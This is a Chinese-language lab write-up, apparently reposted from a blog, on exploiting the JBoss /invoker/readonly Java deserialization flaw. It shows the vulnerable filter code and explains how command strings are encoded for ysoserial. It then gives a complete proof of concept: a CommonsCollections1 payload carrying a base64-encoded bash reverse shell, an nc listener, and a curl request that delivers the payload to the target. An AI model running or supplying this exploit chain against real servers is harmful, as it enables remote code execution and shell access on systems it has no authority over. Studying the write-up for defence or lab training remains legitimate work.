AC ED 00 05序列化
FileOutputStream fos = new FileOutputStream(file);
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(st);
反序列化
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);
Student st1 = (Student) ois.readObject();
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
throws IOException, ServletException
{
HttpServletRequest httpRequest = (HttpServletRequest)request;
Principal user = httpRequest.getUserPrincipal();
if ((user == null) && (this.readOnlyContext != null))
{
ServletInputStream sis = request.getInputStream();
ObjectInputStream ois = new ObjectInputStream(sis);
MarshalledInvocation mi = null;
try
{
mi = (MarshalledInvocation)ois.readObject();
}
catch (ClassNotFoundException e)
{
throw new ServletException("Failed to read MarshalledInvocation", e);
}
request.setAttribute("MarshalledInvocation", mi);
mi.setMethodMap(this.namingMethodMap);
Method m = mi.getMethod();
if (m != null) {
validateAccess(m, mi);
}
}
chain.doFilter(request, response);
}
直接从http中获取数据,在没有进行检查或者过滤的情况下,尝试调用readobject()方法对数据流进行反序列操作,因此产生了Java反序列化漏洞。
java.lang.runtime.exec() payloads编码
使用参考博客:java反序列化工具ysoserial分析 – angelwhu
在终端输入firefox http://172.16.12.2:8080打开目标机jboss默认界面。之后进入漏洞页面http://172.16.12.2:8080/invoker/readonly。http响应码500(内部服务器错误——服务器端的CGI、ASP、JSP等程序发生错误),分析猜想,此处服务器将用户提交的POST内容进行了Java反序列化。
POC(Proof Of Concept),使用bash反弹Shell,nc接受反弹回来的Shell。从github下载工具ysoserial 后,打开源代码能看到在处理数据时使用了Runtime.getRuntime().exec(String cmd),此时调用Runtime.getRuntime().exec(String command, String[] envp, File dir),直接构造的字符串会被下面的代码分割:
/**
* Constructs a string tokenizer for the specified string. The
* tokenizer uses the default delimiter set, which is
* <code>" \t\n\r\f"</code>: the space character,
* the tab character, the newline character, the carriage-return character,
* and the form-feed character. Delimiter characters themselves will
* not be treated as tokens.
*
* @param str a string to be parsed.
* @exception NullPointerException if str is <CODE>null</CODE>
*/
public StringTokenizer(String str) {
this(str, " \t\n\r\f", false);
}
bash -c `bash -i >& /dev/tcp/127.0.0.1/21 0>&1`bash
-c
`bash
-i
>&
/dev/tcp/127.0.0.1/21
0>&1`-此时需要进行编码,编码网站,勾选bash。
注:Linux下的${IFS}也可进行编码,${IFS}的hex值是0x20 0x09 0x0a,因此不被分割,可以利用在写shell时的命令中。需要注意是,${IFS}编码后的命令中有空格,重定时,文件名中有空格会造成命令解析不完整,写入文件会失败。而在反弹shell命令中,就会导致模糊的重定向错误。
java -jar ysoserial.jar [payload] ‘[command]‘java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTEuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
nc -l -p 6666。curl http://172.16.12.2:8080/invoker/readonly --data-binary @poc.ser
http-invoker.sar 组件。http-invoker.sar 下 web.xml的security-constraint 标签中:<url-pattern>/*</url-pattern>用于对 http invoker 组件进行访问控制。原文:https://www.cnblogs.com/ikari/p/8989821.html